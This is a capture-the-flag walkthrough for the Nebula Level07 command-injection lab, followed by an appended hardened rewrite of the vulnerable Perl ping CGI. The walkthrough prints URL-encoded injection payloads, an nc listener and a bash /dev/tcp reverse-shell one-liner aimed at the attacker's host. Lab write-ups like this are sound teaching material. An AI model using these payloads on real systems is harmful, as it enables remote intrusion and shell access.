Exploit-Exercises: Nebula
Level07 - Command injection
Here is what we can find on exploit-exercises:
The flag07 user was writing their very first perl program that allowed them to ping hosts to see if they were reachable from the web server.
To do this level, log in as the level07 account with the password level07. Files for this level can be found in /home/flag07.
They also provide the source code:
#!/usr/bin/perl

use CGI qw{param};

print "Content-type: text/html\n\n";

sub ping {
  $host = $_[0];

  print("<html><head><title>Ping results</title></head><body><pre>");

  @output = `ping -c 3 $host 2>&1`;
  foreach $line (@output) { print "$line"; }

  print("</pre></body></html>");
}

# check if Host set. if not, display normal page, etc
ping(param("Host"));
The weakness of this program is this line:
@output = `ping -c 3 $host 2>&1`;
If we control the variable $host, we can inject a command and get a shell. The backtick operator hands the whole string to /bin/sh, so shell metacharacters inside $host are interpreted.
So let’s try to “hack” this program.
We can run index.cgi with perl like this:
Host=localhost sets the Host parameter to localhost.
Let’s try to inject a command:
You can see that the script runs as level07. This is not what we want, so let’s read thttpd.conf.
This is interesting: a server is running on port 7007.
Now I will show you a method to get a reverse shell.
Web Browser attack
Open Kali Linux and go to http://nebula_ip:7007/index.cgi?Host=localhost
You will see the result of the ping in your web browser.
What if we run our command like this: http://nebula_ip:7007/index.cgi?Host=localhost; id Will it work?
What? No output from the id command?
CGI.pm treats an unencoded “;” in the query string as a parameter separator, just like “&”, so the value of Host stops at localhost. So let’s try to encode the “;”:
http://nebula_ip:7007/index.cgi?Host=localhost%3Bid
Yes! The command is executed as flag07! But now I want a shell!
On my Kali Linux machine I run:
nc -lvp 8888
To get a reverse shell you can run:
bash -i >& /dev/tcp/kali_linux_ip/8888 0>&1
URL-encode it and you will have:
http://nebula_ip:7007/index.cgi?Host=localhost%3Bbash%20-i%20%3E%26%20%2Fdev%2Ftcp%2Fkali_linux_ip%2F8888%200%3E%261
If we visit the link and wait,
you get a shell! Well done, hacker! You’ll be ready for level08.
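Fixing the script: the backtick line identified above as the weakness can be closed by validating Host and by running ping without a shell. The script below is an added example, not the level's code and not part of the original write-up; the helper names valid_host and html_escape and the hostname allowlist are assumptions made for illustration.

```perl
#!/usr/bin/perl
# Added example, not the level's original code: hardened ping CGI.
use strict;
use warnings;
use CGI qw{param};

# Allowlist (assumption): a hostname or IPv4 address built from labels of
# letters, digits and '-', separated by '.'. A label cannot start or end
# with '-', so the value can never be read by ping as an option.
sub valid_host {
    my ($host) = @_;
    return 0 unless defined $host && length($host) <= 253;
    my $label = qr/[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?/;
    return $host =~ /\A$label(?:\.$label)*\z/ ? 1 : 0;
}

# Minimal HTML escaping for text placed inside <pre>.
sub html_escape {
    my ($s) = @_;
    $s =~ s/&/&amp;/g;
    $s =~ s/</&lt;/g;
    $s =~ s/>/&gt;/g;
    return $s;
}

# Run ping without a shell: fork, then exec with an argument list.
# $host reaches ping as a single argv entry, so ';', '|', '$()' and
# backticks have no special meaning even if validation were bypassed.
sub ping {
    my ($host) = @_;
    my $pid = open(my $fh, '-|');          # forks; child's STDOUT is the pipe
    return "could not start ping\n" unless defined $pid;
    if ($pid == 0) {
        open(STDERR, '>&', \*STDOUT);      # same effect as 2>&1
        exec { 'ping' } 'ping', '-c', '3', $host;
        exit 127;                          # only reached if exec failed
    }
    my @output = <$fh>;
    close($fh);
    return join('', @output);
}

print "Content-type: text/html\n\n";
print "<html><head><title>Ping results</title></head><body><pre>";
my $host = scalar param('Host');           # scalar context: one value only
print valid_host($host) ? html_escape(ping($host)) : "Invalid host\n";
print "</pre></body></html>\n";
```

With this version, the request Host=localhost%3Bid from the walkthrough decodes to localhost;id, fails valid_host and prints "Invalid host" without starting any process.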